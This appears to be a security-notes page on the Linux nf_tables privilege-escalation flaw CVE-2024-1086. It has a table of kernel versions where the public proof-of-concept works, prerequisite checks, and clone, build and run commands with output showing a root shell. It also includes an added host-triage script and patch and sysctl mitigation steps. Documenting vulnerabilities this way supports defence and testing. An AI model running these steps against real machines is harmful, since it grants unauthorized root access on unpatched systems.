# nf\_tables - CVE-2024-1086

{% hint style="danger" %}

```
Warning:
This exploit is very volatile and more often than not freezes the target.
I would not recommend trying this in production in its current state.
```

{% endhint %}

A short proof-of-concept of the <mark style="color:red;">**privilege escalation**</mark> exploit for CVE-2024-1086 (`nf_tables`), working on most Linux kernels between versions 5.14 and 6.6, including Debian, Ubuntu and KernelCTF. The exploit is very unstable, <mark style="color:red;">**use with caution**</mark>.

Verify kernel version:

```sh
kali-test :: ~ » uname -r
6.3.0-kali1-amd64
```

Verify that unprivileged users can create namespaces:

```sh
kali-test :: ~ » sysctl kernel.unprivileged_userns_clone && sysctl user.max_user_namespaces
kernel.unprivileged_userns_clone = 1
user.max_user_namespaces = 31303

kali-test :: ~ » grep -E 'CONFIG_USER_NS|CONFIG_INIT_ON_ALLOC_DEFAULT_ON' /boot/config-$(uname -r)
CONFIG_USER_NS=y
CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y
```

Verify whether the kernel version is vulnerable to CVE-2024-1086 according to the table below. \
**Note**: the exploit works up to and including version 6.6.4 if `CONFIG_INIT_ON_ALLOC_DEFAULT_ON` is toggled off.

| Kernel Version | Working/Fail | Fail Reason                                                                    |
| -------------- | ------------ | ------------------------------------------------------------------------------ |
| v5.4.270       | fail         | [CODE] pre-dated nft code (denies rule alloc)                                  |
| v5.10.209      | fail         | [TCHNQ] BUG mm/slub.c:4118                                                     |
| v5.14.21       | working      | n/a                                                                            |
| v5.15.148      | working      | n/a                                                                            |
| v5.16.20       | working      | n/a                                                                            |
| v5.17.15       | working      | n/a                                                                            |
| v5.18.19       | working      | n/a                                                                            |
| v5.19.17       | working      | n/a                                                                            |
| v6.0.19        | working      | n/a                                                                            |
| v6.1.55        | working      | n/a                                                                            |
| v6.1.69        | working      | n/a                                                                            |
| v6.1.72        | working      | n/a                                                                            |
| v6.2.?         | working      | n/a                                                                            |
| v6.2.16        | working      | n/a                                                                            |
| v6.3.13        | working      | n/a                                                                            |
| v6.4.16        | fail         | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y |
| v6.5.3         | fail         | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y |
| v6.5.13        | fail         | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y |
| v6.6.14        | fail         | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y |
| v6.7.1         | fail         | [CODE] nft verdict value incorrect, is altered by kernel                       |
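The three verification steps above (kernel release, unprivileged user namespaces, `CONFIG_INIT_ON_ALLOC_DEFAULT_ON`) can be folded into one triage script that classifies a host against the table without running the PoC. This is an added example, not part of the original note or the exploit repository; the category names and the 5.14.0 to 6.6.4 window (with 6.4.0 as the point from which the table blames `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y`) are my reading of the page.

```sh
#!/bin/sh
# Added triage helper (not the page's or the PoC's own code).

# ver_num: turn "6.3.0-kali1-amd64" into a comparable integer (6003000).
ver_num() {
    v=${1%%-*}                          # drop "-kali1-amd64" style suffixes
    maj=${v%%.*}; rest=${v#*.}
    [ "$rest" = "$v" ] && rest=0        # no minor component present
    min=${rest%%.*}; rest2=${rest#*.}
    [ "$rest2" = "$rest" ] && rest2=0   # no patch component present
    pat=${rest2%%.*}
    echo $(( maj * 1000000 + min * 1000 + pat ))
}

# assess_cve_2024_1086 <uname -r> <kernel.unprivileged_userns_clone> <INIT_ON_ALLOC y|n>
# Prints one of:
#   outside-poc-range        kernel outside the 5.14.0 .. 6.6.4 window the note covers
#   mitigated-userns         unprivileged user namespaces disabled (the page's workaround)
#   poc-fails-init-on-alloc  6.4+ with CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (table: "bad page")
#   exposed                  table predicts the PoC works; patch the kernel
assess_cve_2024_1086() {
    n=$(ver_num "$1"); userns=$2; init_on_alloc=$3
    lo=$(ver_num 5.14.0); hi=$(ver_num 6.6.4); ioa_from=$(ver_num 6.4.0)
    if [ "$n" -lt "$lo" ] || [ "$n" -gt "$hi" ]; then
        echo outside-poc-range; return 0
    fi
    if [ "$userns" != "1" ]; then
        echo mitigated-userns; return 0
    fi
    if [ "$n" -ge "$ioa_from" ] && [ "$init_on_alloc" = "y" ]; then
        echo poc-fails-init-on-alloc; return 0
    fi
    echo exposed
}

# Collect the three inputs from the running host, exactly as the page does.
# kernel.unprivileged_userns_clone only exists on Debian-family kernels.
assess_this_host() {
    kver=$(uname -r)
    userns=$(sysctl -n kernel.unprivileged_userns_clone 2>/dev/null || echo unknown)
    ioa=$(sed -n 's/^CONFIG_INIT_ON_ALLOC_DEFAULT_ON=//p' "/boot/config-$kver" 2>/dev/null || true)
    printf '%s userns_clone=%s init_on_alloc=%s -> %s\n' "$kver" "$userns" "${ioa:-n}" \
        "$(assess_cve_2024_1086 "$kver" "$userns" "${ioa:-n}")"
}

if [ "${1:-}" = "--host" ]; then assess_this_host; fi
```

Run it with `--host` to classify the current machine; a result of `exposed` or `poc-fails-init-on-alloc` still means the kernel is affected and should be upgraded, the latter only says this particular PoC is unlikely to succeed.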

Clone the repository, install the build dependency and build the exploit:

```sh
kali-test :: ~ » git clone https://github.com/Notselwyn/CVE-2024-1086
kali-test :: ~ » sudo apt install musl-tools
kali-test :: ~ » cd CVE-2024-1086
kali-test :: ~/CVE-2024-1086 ‹main› » make
```

Run the exploit:

```sh
kali-test :: ~/CVE-2024-1086 ‹main› » ./exploit 
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[... snip ...]

# id
uid=0(root) gid=0(root) groups=0(root)
# uname -r 
6.3.0-kali1-amd64
```

***

## Patch

To patch the vulnerability, simply upgrade the kernel to a non-vulnerable version.

If you are not able to upgrade the kernel for some reason, you can <mark style="color:orange;">**temporarily**</mark> mitigate the issue by denying unprivileged users the ability to create namespaces:\
`sudo sysctl -w kernel.unprivileged_userns_clone=0`

Or <mark style="color:green;">**permanently**</mark> by:\
`echo kernel.unprivileged_userns_clone=0 | sudo tee /etc/sysctl.d/99-disable-unpriv-userns.conf`

The file is applied at boot; to apply it immediately as well, run `sudo sysctl --system`.
